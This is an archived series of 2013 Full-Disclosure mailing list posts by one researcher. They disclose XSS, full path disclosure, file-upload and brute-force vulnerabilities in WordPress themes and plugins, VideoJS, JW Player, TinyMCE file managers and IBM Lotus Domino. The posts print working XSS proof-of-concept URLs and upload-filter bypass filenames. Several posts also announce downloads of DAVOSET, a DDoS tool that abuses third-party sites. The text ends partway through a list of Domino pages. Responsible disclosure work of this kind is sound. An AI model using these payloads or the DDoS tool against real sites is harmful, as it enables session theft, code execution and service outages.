http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] DAVOSET v.1.0.7
Hello participants of Mailing List. After making public release of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html), I've made next update of the software. On Friday, 21.06.2013, DAVOSET v.1.0.7 was released - DDoS attacks via other sites execution tool (http://websecurity.com.ua/davoset/). Download DAVOSET v.1.0.7: http://websecurity.com.ua/uploads/2013/DAVOSET_v.1.0.7.rar Use, don't abuse. Among other improvements in new version, in 1.0.7 there were removed non-working URLs of services from both zombies lists and added new vulnerable services. The total number of zombies URLs was left the same: 20 and 30 in two lists. In particular, I've removed Babelfish from the lists, since Yahoo closed it already in 2012. Instead of fixing Cross-Site Scripting, Abuse of Functionality and Insufficient Anti-automation vulnerabilities in their Babelfish service, about which I've informed them already in 2009, they first ignored these holes and after three years completely closed the service. This is fate of all holed web sites. But there are a lot of other vulnerable sites, so the lists will be updating. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] DAVOSET v.1.0.6
Hello participants of Mailing List. After releasing previous version of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html), I've released DAVOSET v.1.0.6 - DDoS attacks via other sites execution tool (http://websecurity.com.ua/davoset/), on Tuesday, 18.06.2013. Download DAVOSET v.1.0.6: http://websecurity.com.ua/uploads/2013/DAVOSET_v.1.0.6.rar Use, don't abuse. Important change in version 1.0.6, that I put updated version of list_full.txt into the bundle. Already in 2010, specially for conducting my research described in the article about DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-July/006832.html), I've made two lists of zombie servers. Basic list (list.txt) with 20 services and extended list (list_full.txt), with all services found by me, which can be used as zombie-servers with DAVOSET. For last three years I was updating extended list with new services (admins of these services were informed by me, but they ignored to fix the vulnerabilities). I haven't released this list in version 1.0.5, but added it to the bundle of version 1.0.6. And today I'm planning to release new version of the tool with additional improvements. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] FPD, XSS and CS vulnerabilities in Slash WP theme for WordPress
Hello list! I want to warn you about multiple vulnerabilities in Slash WP theme for WordPress. This is commercial theme for WP. These are Full path disclosure, Cross-Site Scripting and Content Spoofing vulnerabilities. - Affected products: - Vulnerable are all versions of Slash WP theme for WordPress. After I've informed developers about these vulnerabilities in April, they just thanked and promised to look at these vulnerabilities. There are no information if they fixed these holes already or when they are planning to do it. So all users of the theme should contact the developers for updates. - Affected vendors: - Dream-Theme http://dream-theme.com -- Details: -- Full path disclosure (WASC-13): http://site/wp-content/themes/slash-wp/ FPD in index.php and other php-files in plugin's folder and subfolders. Cross-Site Scripting (WASC-08): In the theme there are jPlayer 2.1.0 and JW Player 5.8.2011, about vulnerabilities in which I wrote earlier (in 2012 and 2013). http://site/wp-content/themes/slash-wp/js/jplayer/Jplayer.swf?jQuery=)}catch(e){}if(!self.a)self.a=!alert(document.cookie)// http://site/wp-content/themes/slash-wp/js/jplayer/Jplayer.swf?id=%27))}catch(e){}if(!self.a)self.a=!alert(document.cookie)// http://site/wp-content/themes/slash-wp/js/jwplayer/player.swf?playerready=alert(document.cookie) http://site/wp-content/themes/slash-wp/js/jwplayer/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg There is flash file of JW Player at some sites with this theme, but not at others. According to theme's description, theme has built-in support of JW Player, but it's not included in standard bundle (only jPlayer). But it can be installed separately and some web sites owners do it. Content Spoofing (WASC-12): About Content Spoofing vulnerabilities and about other XSS vulnerabilities in JW Player (http://securityvulns.com/docs28176.html) and in jPlayer (http://securityvulns.com/docs29316.html), you can read in corresponding advisories. Timeline: 2013.04.11 - announced at my site. 2013.04.12 - informed developers. 2013.06.20 - disclosed at my site (http://websecurity.com.ua/6440/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] DDoS attacks via other sites execution tool
Hello participants of Mailing List. If you haven't read my article (written in 2010 and last week I wrote about it to WASC list) Advantages of attacks on sites with using other sites (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008846.html), feel free to do it. In this article I reminded you about using of the sites for attacks on other sites (http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html), DDoS attacks via other sites execution tool (DAVOSET) (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-July/006832.html), sending spam via sites and creating spam-botnets (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-July/006863.html) and wrote about advantages of attacks on sites with using other sites. Last week I've published online my DDoS attacks via other sites execution tool (http://websecurity.com.ua/davoset/). It's tool for conducting of DDoS attacks via Abuse of Functionality vulnerabilities on the sites, which I've made in 2010. Description and changelog on English are presented at my site. Where you can get my DAVOSET v.1.0.5 (made at 18.07.2010). This is the last version of my DAVOSET. After that I've stopped its development. But now I am planning to continue development of the software and to release new versions (I'll release v.1.0.6 today). For three years I was holding this tool privately, but now released it for free access. So everyone can test Abuse of Functionality vulnerabilities at multiple web sites - like Google's sites, W3C and many others, which were informed by me many times during many years (I was informing admins of web sites about such vulnerabilities since 2007), but ignored and don't want to fix these holes for a long time, and for example Google continued to create new services with Abuse of Functionality and Insufficient Anti-automation vulnerabilities, which can be used for such DoS and DDoS attacks. It must bring attention to the danger of these vulnerabilities (which I was trying to do in my articles in 2010). Because in most cases owners of web sites and web developers ignore and don't fix them. Which can be used for DoS attacks as on other sites, as on the sites with Abuse of Functionality vulnerabilities themselves, about which I wrote in my article Using of the sites for attacks on other sites. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] IA and AFU vulnerabilities in aCMS
Hello list! These are Insufficient Authorization and Arbitrary File Uploading vulnerabilities in aCMS. This is commercial CMS. There are multiple vulnerabilities in aCMS and it's the second part of them. - Affected products: - Vulnerable are aCMS 1.0 and previous versions. - Affected vendors: - Almacor http://almacor.ru -- Details: -- Insufficient Authorization (WASC-02): There is no restriction on accessing file manager and image manager. Which is not default behavior (developer of MCFileManager and MCImageManager states, that by default these web applications require authorization) and is made by developers of aCMS. http://site/assets/js/tiny_mce/plugins/filemanager/pages/fm/index.html http://site/assets/js/tiny_mce/plugins/imagemanager/pages/im/index.html Arbitrary File Uploading (WASC-31): Plugins MCFileManager and MCImageManager for TinyMCE, which are using in the system, are vulnerable to execution of arbitrary code through bypass of programs' security filters (on IIS and Apache web servers). http://site/assets/js/tiny_mce/plugins/filemanager/pages/fm/index.html http://site/assets/js/tiny_mce/plugins/imagemanager/pages/im/index.html Code will execute via file uploading. The first program is vulnerable to three methods of code execution: via using of symbol ";" (1.asp;.txt) in file name (IIS). via "1.asp" in folder name (IIS), via double extension (1.php.txt) (Apache with special configuration). And the second program is vulnerable to two methods of code execution (#1 and #3). Timeline: 2013.03.04 - informed developers about part of the vulnerabilities. 2013.04.03 - informed developers about another part of the vulnerabilities. 2013.04.06 - announced at my site. 2013.04.07 - informed developers about another part of the vulnerabilities. 2013.05.25 - informed developers about another part of the vulnerabilities. In all cases the developers just ignored all messages via different e-mails and contact form. 2013.06.04 - disclosed at my site (http://websecurity.com.ua/6428/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] FPD and Security bypass vulnerabilities in AntiVirus for WordPress
Hello list! These are Full path disclosure and Security bypass vulnerabilities in AntiVirus for WordPress. This is security plugin for detecting exploits and backdoors in WordPress. Which failed to identify my Backdoored Web Application (BWA) - a reference test of backdoor scanners (released in December). Last week I've published article "Backdoor scanners testing among plugins for WordPress" (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-May/008832.html). In which I described the results of the testing of multiple plugins-scanners for WordPress and described methods of bypassing all of these scanners. - Affected products: - AntiVirus for WordPress 1.0 and previous versions. Versions from 1.1 to 1.3.4 are still vulnerable to Security bypass, but Full path disclosure was fixed by removing uninstall.php in 1.1. - Affected vendors: - AntiVirus for WordPress http://wpantivirus.com -- Details: -- Full path disclosure (WASC-13): http://site/wp-content/plugins/antivirus/uninstall.php Security bypass (WASC-31): This security bypass allows to inject php backdoor into web site (for executing OS commands), which will not be identified by the plugin. All details about detecting BWA by the plugin and methods of the bypass are described in my article. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] FPD and Security bypass vulnerabilities in Exploit Scanner for WordPress
Hello list! These are Full path disclosure and Security bypass vulnerabilities in Exploit Scanner for WordPress. This is security plugin for detecting exploits and backdoors in WordPress. Which failed to identify my Backdoored Web Application (BWA) - a reference test of backdoor scanners (released in December). Last week I've published article "Backdoor scanners testing among plugins for WordPress" (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-May/008832.html). In which I described the results of the testing of multiple plugins-scanners for WordPress and described methods of bypassing all of these scanners. Exploit Scanner was the most bypassable scanner among tested plugins. - Affected products: - Exploit Scanner for WordPress 1.3.3 and previous versions. Tested in Exploit Scanner 0.95, 1.0.4 and 1.3.3. - Affected vendors: - Exploit Scanner http://wordpress.org/plugins/exploit-scanner/ -- Details: -- Full path disclosure (WASC-13): http://site/wp-content/plugins/exploit-scanner/exploit-scanner.php Security bypass (WASC-31): This security bypass allows to inject php backdoor into web site (for executing OS commands), which will not be identified by the plugin. All details about detecting BWA by different versions of the plugin and methods of their bypass are described in my article. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Backdoor scanners testing
Hello participants of Full-Disclosure! Today I wrote to WASC mailing list about my backdoor scanners testing (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-May/008832.html). Last week I've published the article with results of the testing. I was planning to made this testing already in December, after I've released my Backdoored Web Application (BWA) - a reference test of backdoors scanners (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2012-December/008630.html), but made it only in May. In my article I examined different backdoor scanners among plugins for WordPress. Feel free to read it, if this topic is interesting for you. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] XSS and FPD vulnerabilities in I Love It New theme for WordPress
Hello list! These are Cross-Site Scripting and Full path disclosure vulnerabilities in I Love It New theme for WordPress. This is commercial (premium) theme. Earlier I've wrote about vulnerabilities in VideoJS (http://seclists.org/fulldisclosure/2013/May/21) and in multiple web applications. - Affected products: - All versions of I Love It New theme for WordPress. The theme contains vulnerable versions of VideoJS and Audio Player. Vulnerable are web applications which are using VideoJS Flash Component 3.0.2 and previous versions. Version VideoJS Flash Component 3.0.2 is not vulnerable to mentioned XSS hole, except XSS via JS callbacks (as it can be read in repository on github). Also there are bypass methods which work in the last version, but the developers haven't fixed them due to their low impact. So update to last version of VideoJS.swf. - Affected vendors: - CosmoThemes http://cosmothemes.com -- Details: -- Cross-Site Scripting (WASC-08): http://site/wp-content/themes/iloveitnew/videojs/videojs/video-js.swf?readyFunction=alert(document.cookie) http://site/wp-content/themes/iloveitnew/lib/php/assets/player.swf?playerID=\%22))}catch(e){alert(document.cookie)}// Full path disclosure (WASC-13): There are FPD vulnerabilities in index.php and almost all other php-files (in folder and subfolders). http://site/wp-content/themes/iloveitnew/ http://site/wp-content/themes/iloveitnew/videojs/video-js.php http://site/wp-content/themes/iloveitnew/videojs/admin.php Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] AFU vulnerabilities in MCImageManager for TinyMCE
Hello list! I want to warn you about vulnerabilities in Moxiecode Image Manager (MCImageManager). This is commercial plugin for TinyMCE. It concerns as MCImageManager, as all web applications which have MCImageManager in their bundle. These are Arbitrary File Uploading vulnerabilities, which lead to Code Execution on IIS and Apache web servers. - Affected products: - Vulnerable are Moxiecode Image Manager 3.1.5 and previous versions. - Affected vendors: - Moxiecode http://www.moxiecode.com -- Details: -- Arbitrary File Uploading (WASC-31): http://site/path/tiny_mce/plugins/imagemanager/pages/im/index.html Execution of arbitrary code is possible due to bypass of program's security filters (on IIS and Apache web servers). Code will execute via file uploading. Program is vulnerable to two methods of code execution: 1. Via using of symbol ";" (1.asp;.txt) in file name (IIS). 2. Via double extension (1.php.txt) (Apache with special configuration). MCImageManager has only two such holes in comparison with three holes in MCFileManager (about which I wrote earlier). The attack via folder name was not working already in version 3.1.0.4. Both these web applications have other vulnerabilities about which I'll write later. Timeline: 2013.03.31 - briefly informed developer (together with other issues related to TinyMCE). 2013.04.01 - informed developer in detail. 2013.04.03 - announced at my site. 2013.04.04 - the developer planned to fix these holes in new version in nearest days. 2013.05.18 - disclosed at my site (http://websecurity.com.ua/6416/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] AFU vulnerabilities in MCFileManager for TinyMCE
Hello list! I want to warn you about vulnerabilities in Moxiecode File Manager (MCFileManager). This is commercial plugin for TinyMCE. It concerns as MCFileManager, as all web applications which have MCFileManager in their bundle. These are Arbitrary File Uploading vulnerabilities, which lead to Code Execution on IIS and Apache web servers. - Affected products: - Vulnerable are Moxiecode File Manager 3.1.5 and previous versions. - Affected vendors: - Moxiecode http://www.moxiecode.com -- Details: -- Arbitrary File Uploading (WASC-31): Execution of arbitrary code is possible due to bypass of program's security filters (on IIS and Apache web servers). Code will execute via file uploading. Program is vulnerable to three methods of code execution: 1. Via using of symbol ";" (1.asp;.txt) in file name (IIS). 2. Via "1.asp" in folder name (IIS). 3. Via double extension (1.php.txt) (Apache with special configuration). Timeline: 2013.03.31 - briefly informed developer (together with other issues related to TinyMCE). 2013.04.01 - informed developer in detail. 2013.04.02 - announced at my site. 2013.04.04 - the developer planned to fix these holes in new version in nearest days. 2013.05.17 - disclosed at my site (http://websecurity.com.ua/6413/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vulnerabilities in multiple plugins for WordPress with VideoJS
Hello list! These are Cross-Site Scripting vulnerabilities in multiple plugins for WordPress with VideoJS. Earlier I've wrote about vulnerabilities in VideoJS (http://seclists.org/fulldisclosure/2013/May/21). This is popular video and audio player, which is used at hundreds thousands of web sites and in multiple web applications. Google dork for VideoJS shows 446000 results and for WP plugins with it shows 178000 (inurl:video-js.swf inurl:wp-content/plugins/). In addition to plugin VideoJS - HTML5 Video Player for WordPress (http://seclists.org/fulldisclosure/2013/May/35), about which I wrote earlier, here are new plugins with this player. Among them are Video Embed & Thumbnail Generator, External "Video for Everybody", 1player, S3 Video and EasySqueezePage. But there are other vulnerable plugins for WP with video-js.swf (which can be found with above-mentioned Google dork). All developers of these plugins, the same as developers of all other web applications with VideoJS, need to update it in their software. - Affected products: - Video Embed & Thumbnail Generator 4.0.3 and previous versions. External "Video for Everybody" 2.0 and previous versions. 1player 1.2 and previous versions. S3 Video 0.97 and previous versions. EasySqueezePage (all versions). Vulnerable are web applications which are using VideoJS Flash Component 3.0.2 and previous versions. Version VideoJS Flash Component 3.0.2 is not vulnerable to mentioned XSS hole, except XSS via JS callbacks (as it can be read in repository on github). Also there are bypass methods which work in the last version, but the developers haven't fixed them due to their low impact. So update to last version of VideoJS.swf. - Affected vendors: - Plugins' pages at WordPress plugins catalog: Video Embed & Thumbnail Generator http://wordpress.org/extend/plugins/video-embed-thumbnail-generator/ External "Video for Everybody" http://wordpress.org/extend/plugins/external-video-for-everybody/ 1player http://wordpress.org/extend/plugins/1player/ S3 Video http://wordpress.org/extend/plugins/s3-video/ -- Details: -- Cross-Site Scripting (WASC-08): Video Embed & Thumbnail Generator: http://site/wp-content/plugins/video-embed-thumbnail-generator/video-js/video-js.swf?readyFunction=alert(document.cookie) External "Video for Everybody": http://site/wp-content/plugins/external-video-for-everybody/video-js/video-js.swf?readyFunction=alert(document.cookie) 1player: http://site/wp-content/plugins/1player/players/video-js/video-js.swf?readyFunction=alert(document.cookie) S3 Video: http://site/wp-content/plugins/s3-video/misc/video-js.swf?readyFunction=alert(document.cookie) EasySqueezePage: http://site/wp-content/plugins/EasySqueezePage/videojs/video-js.swf?readyFunction=alert(document.cookie) Timeline: 2013.02.07 - found XSS vulnerability. 2013.02.08 - informed developers of VideoJS about both vulnerabilities. They thanked and promised to fix it. 2013.02.23 - reminded VideoJS developers and asked for date of releasing the fix. 2013.03.09 - again reminded developers. 2013.03.26 - again reminded developers. 2013.04.08 - reminded developers on github and resent previous letter to Zencoder's developers (since Brightcove, which acquired Zencoder, ignored the hole for two months). 2013.04.08-30 - discussed with developers (on github and by e-mail). And made my own fix to force developers to fix the hole. 2013.04.30 - developers fixed XSS hole in VideoJS Flash Component 3.0.2 in source code on github. 2013.05.02 - developers compiled fixed version of swf (after my reminding) and uploaded to both repositories. 2013.05.02 - tested version 3.0.2 and found that developers haven't fixed the hole completely and informed them. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] XSS and FPD vulnerabilities in Search and Share for WordPress
Hello list! I want to inform you about vulnerabilities in Search and Share plugin for WordPress. These are Cross-Site Scripting and Full path disclosure vulnerabilities. These XSS holes are in ZeroClipboard.swf, which is used in the plugin. In February I've wrote about Cross-Site Scripting vulnerabilities in ZeroClipboard (http://seclists.org/fulldisclosure/2013/Feb/103) and in multiple web applications. - Affected products: - Vulnerable are Search and Share 0.9.3 and previous versions. - Affected vendors: - Latent Motion http://www.latentmotion.com -- Details: -- Cross-Site Scripting (WASC-08): XSS via id parameter and XSS via copying payload into clipboard. http://site/wp-content/plugins/search-and-share/js/ZeroClipboard.swf?id=\%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height Full path disclosure (WASC-13): http://site/wp-content/plugins/search-and-share/SearchAndShare.php http://site/wp-content/plugins/search-and-share/error_log (leakage of full paths at web sites where showing errors is off and they are saving into error_log) Timeline: 2013.02.18 - informed old and new developers of ZeroClipboard. 2013.03.26 - announced at my site. 2013.03.27 - informed developers of Search and Share. 2013.05.11 - disclosed at my site (http://websecurity.com.ua/6394/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vulnerabilities in multiple web applications with VideoJS
Hello list! These are Cross-Site Scripting vulnerabilities in multiple web applications with VideoJS. Earlier I've wrote about vulnerabilities in VideoJS (http://seclists.org/fulldisclosure/2013/May/21). This is popular video and audio player, which is used at hundreds thousands of web sites and in multiple web applications. Among them are VideoJS - HTML5 Video Player for WordPress, Video.js for Drupal, bo:VideoJS for Joomla, videojs-youtube, Telemeta (CMS). And a lot of other web applications. All developers of these applications, the same as developers of all other web applications with VideoJS, need to update it in their software. - Affected products: - Vulnerable are web applications which are using VideoJS Flash Component 3.0.2 and previous versions. Version VideoJS Flash Component 3.0.2 is not vulnerable to mentioned XSS hole, except XSS via JS callbacks (as it can be read in repository on github). Also there are bypass methods which work in the last version, but the developers haven't fixed them due to their low impact. So update to last version of VideoJS.swf. Vulnerable are the next web applications: VideoJS - HTML5 Video Player for WordPress 3.2.3 and previous versions. Video.js for Drupal 6.x-2.2 and previous 6.x-2.x versions and 7.x-2.2 and previous 7.x-2.x versions (only these versions are using VideoJS Flash Component). bo:VideoJS for Joomla 2.1.1 and previous versions (with VideoJS Flash Component). videojs-youtube (all versions). Telemeta 1.4.4 and previous versions. All these developers were informed last week. - Affected vendors: - VideoJS and VideoJS Flash Component were developed by Zencoder. Earlier Zencoder, now Brightcove http://videojs.com -- Details: -- Cross-Site Scripting (WASC-08): Original example for VideoJS: http://site/video-js.swf?readyFunction=alert(document.cookie) VideoJS - HTML5 Video Player for WordPress: http://site/wp-content/plugins/videojs-html5-video-player-for-wordpress/videojs/video-js.swf?readyFunction=alert(document.cookie) Video.js for Drupal: http://site/sites/all/libraries/video-js/video-js.swf?readyFunction=alert(document.cookie) bo:VideoJS for Joomla: http://site/plugins/content/bo_videojs/video-js/video-js.swf?readyFunction=alert(document.cookie) videojs-youtube: http://site/lib/video-js.swf?readyFunction=alert(document.cookie) Telemeta: http://site/htdocs/video-js/video-js.swf?readyFunction=alert(document.cookie) Timeline: 2013.02.07 - found XSS vulnerability. 2013.02.08 - informed developers of VideoJS about both vulnerabilities. They thanked and promised to fix it. 2013.02.23 - reminded VideoJS developers and asked for date of releasing the fix. 2013.03.09 - again reminded developers. 2013.03.26 - again reminded developers. 2013.04.08 - reminded developers on github and resent previous letter to Zencoder's developers (since Brightcove, which acquired Zencoder, ignored the hole for two months). 2013.04.08-30 - discussed with developers (on github and by e-mail). And made my own fix to force developers to fix the hole. 2013.04.30 - developers fixed XSS hole in VideoJS Flash Component 3.0.2 in source code on github. 2013.05.02 - developers compiled fixed version of swf (after my reminding) and uploaded to both repositories. 2013.05.02 - tested version 3.0.2 and found that developers haven't fixed the hole completely and informed them. 2013.05.03 - informed developers of VideoJS - HTML5 Video Player for WordPress. 2013.05.04 - informed developers of Video.js for Drupal, bo:VideoJS for Joomla, videojs-youtube, Telemeta. Alongside with sending letter to developer of bo:VideoJS, also I informed Joomla VEL. They put this extension from JED to VEL. 2013.05.05 - since developer of videojs-youtube had no e-mails in his github account and the his e-mail mentioned at different web sites was not working already, so I published my letter on github. 2013.05.07 - Telemeta developers answered and thanked (the only one among these developers). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vulnerabilities in VideoJS
Hello list! I want to inform you about vulnerabilities in VideoJS. This is popular video and audio player, which is used at hundreds thousands of web sites and in multiple web applications. This is Cross-Site Scripting vulnerability in VideoJS. There is also DoS hole related to this player, which I've found at 27.01.2013 at vine.co, which was using VideoJS Flash Component v3.0 (http://vine.co/v/b5HpgZT3ZwL). Which concerned with Flash Player, Adobe fixed it already at 12th of February. More information is in my advisory for DoS vulnerability in Adobe Flash Player (http://seclists.org/fulldisclosure/2013/Apr/9). Here is my video demonstration of BSOD in Adobe Flash in Mozilla Firefox with using VideoJS (http://www.youtube.com/watch?v=xi29KZ3LD80). - Affected products: - Vulnerable are versions before VideoJS Flash Component 3.0.2 and VideoJS 4.0. Versions VideoJS Flash Component 3.0.2 and VideoJS 4.0 are not vulnerable to mentioned XSS hole, except XSS via JS callbacks (as it can be read in repository on github). Also there are bypass methods which work in the last version, but the developers haven't fixed them due to their low impact. This week developers are planning to officially release VideoJS 4.0 (but swf-file with fixed XSS hole is already available at video.js and video-js-swf repositories on github). Updated version of VideoJS.swf is available in the next repositories: https://github.com/videojs/video-js-swf https://github.com/MustLive/video-js-swf - Affected vendors: - Earlier Zencoder, now Brightcove http://videojs.com -- Details: -- Cross-Site Scripting (WASC-08): http://site/video-js.swf?readyFunction=alert(document.cookie) But the fix in VideoJS Flash Component 3.0.2 is not protecting from the next attacks: http://site/video-js.swf?readyFunction=alert http://site/video-js.swf?readyFunction=prompt http://site/video-js.swf?readyFunction=confirm Which are small ones and the developers don't worry about them, so after I've drawn their attention last week on incomplete fix, they still released such fix. But they will think about improving their protection in the future versions. Timeline: 2013.01.27 - found DoS (BSOD) vulnerability. 2013.01.28 - recorded video PoC. And in the night have informed Adobe. 2013.02.07 - found XSS vulnerability. 2013.02.08 - informed developers of VideoJS about both vulnerabilities. They thanked and promised to fix it. 2013.02.12 - Adobe fixed DoS vulnerability. 2013.02.23 - reminded VideoJS developers and asked for date of releasing the fix. 2013.03.09 - again reminded developers. 2013.03.26 - again reminded developers. 2013.04.08 - reminded developers on github and resent previous letter to Zencoder's developers (since Brightcove, which acquired Zencoder, ignored the hole for two months). 2013.04.08-30 - discussed with developers (on github and by e-mail). And made my own fix to force developers to fix the hole. 2013.04.30 - developers fixed XSS hole in VideoJS Flash Component 3.0.2 in source code on github. 2013.05.02 - developers compiled fixed version of swf (after my reminding) and uploaded to both repositories. 2013.05.02 - tested version 3.0.2 and found that developers haven't fixed the hole completely and informed them. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] XSS vulnerability in JW Player and JW Player Pro
Hello list! I want to warn you about new XSS vulnerability in JW Player and JW Player Pro. Last year I've written about multiple Content Spoofing and Cross-Site Scripting vulnerabilities in JW Player and JW Player Pro, and this is new Cross-Site Scripting vulnerability (about which I've not wrote in 2012). In June I wrote about vulnerabilities in JW Player (http://securityvulns.ru/docs28176.html) and in August about vulnerabilities in licensed version of the player - JW Player Pro (http://securityvulns.ru/docs28483.html). This new vulnerability concerns both versions of the player, as I've verified. - Affected products: - Vulnerable are versions JW Player and JW Player Pro before 5.10.2393. Tested in 5.10.2295 and previous versions. The developers fixed this and two previous strictly social XSS holes in version 5.10.2393 at 20.08.2012. Note, that all versions of JW Player (with support of callbacks), including last 6.x versions, are still vulnerable to XSS via JS callbacks (as described in my first advisory). - Affected vendors: - LongTail Video http://longtailvideo.com -- Details: -- Earlier I've wrote about two strictly social XSS vulnerabilities in JW Player Pro in logo.link and aboutlink parameters (XSS payload executes after user's click). And in the middle of this week I've found similar hole in parameter link (which worked in both versions of JW Player), when came to developer's site (trac) to find out how they fixed these holes (since they haven't fixed strictly social XSS holes in May 2012, only reflected XSS hole). I supposed that they were aware about these holes, when I found them, since they had protection from javascript and vbscript URIs and I bypassed their protection with data URI (for previous two holes and this new hole). So they fixed all these holes in one patch in version 5.10.2393. XSS (WASC-08): http://site/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg For conducting this attack, besides using parameter link, it's needed to set parameters displayclick=link and file. If to set video in parameter file, then it must be address of existent video-file, but if to set image, then it can be arbitrary name of jpg-file (even non-existent). Names of the swf-file can be different: jwplayer.swf, player.swf or others. Timeline: 2012.05.25 - found vulnerabilities during pentest in JW Player (in version 5.7.1896 and tested in the last version from official site). 2012.05.29 - informed developers. 2012.05.29 - developers answered that most holes should be fixed in version 5.9.2206 (in trunk). 2012.05.31 - after checking, I've informed developers that in trunk only one XSS are fixed. Then they answered that they were planning to fix all other vulnerabilities in upcoming 6.0 version of the player. 2012.08.12 - found vulnerabilities at official web sites of one commercial CMS with JW Player Pro. 2012.08.18 - informed developers about holes in JW Player Pro. 2012.08.20 - developers fixed three strictly social XSS holes. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] BF and IA vulnerabilities in IBM Lotus Domino
Hello list! I want to warn you about Brute Force and Insufficient Authentication vulnerabilities in IBM Lotus Domino. These are vulnerabilities in Domino, which I've found at 03.05.2012 together with other holes. Last year I've announced multiple vulnerabilities in IBM software and after IBM fixed many of them, I've disclosed them. They fixed almost all vulnerabilities (with few exceptions, like Brute Force in IBM Lotus Notes Traveler), which I've informed them in May and December, and concerning other holes they always told, that they were working on them. After IBM released Domino 9.0 last month and still not answered concerning these vulnerabilities, I've reminded IBM and they answered, that they would not be fixing them. - Affected products: - Vulnerable are IBM Lotus Domino 8.5.3, 8.5.4, 9.0 and previous versions. These vulnerabilities haven't been fixed non in Domino 8.5.4 (released in August 2012), nor in Domino 9.0 (released in Match 2013). As recently IBM told me, almost after a year since my informing about these vulnerabilities, they didn't fixed them, as they didn't see a need in it. Because, according to them, there are built-in mechanisms in Domino for protecting against BF and IA, so these holes are not a problem of the application (but a problem of specific web sites). I.e. they meant, that owners of web sites with Lotus Domino need to better configure it for protection against these attacks. - Affected vendors: - IBM Domino (formerly IBM Lotus Domino) http://www-03.ibm.com/software/products/us/en/ibmdomino/ -- Details: -- Brute Force (WASC-11): These pages, which require authentication, have no protection against Brute Force attacks: http://site/names.nsf http://site/admin4.nsf http://site/busytime.nsf http://site/catalog.nsf http://site/certsrv.nsf http://site/domlog.nsf http://site/events4.nsf http://site/log.nsf 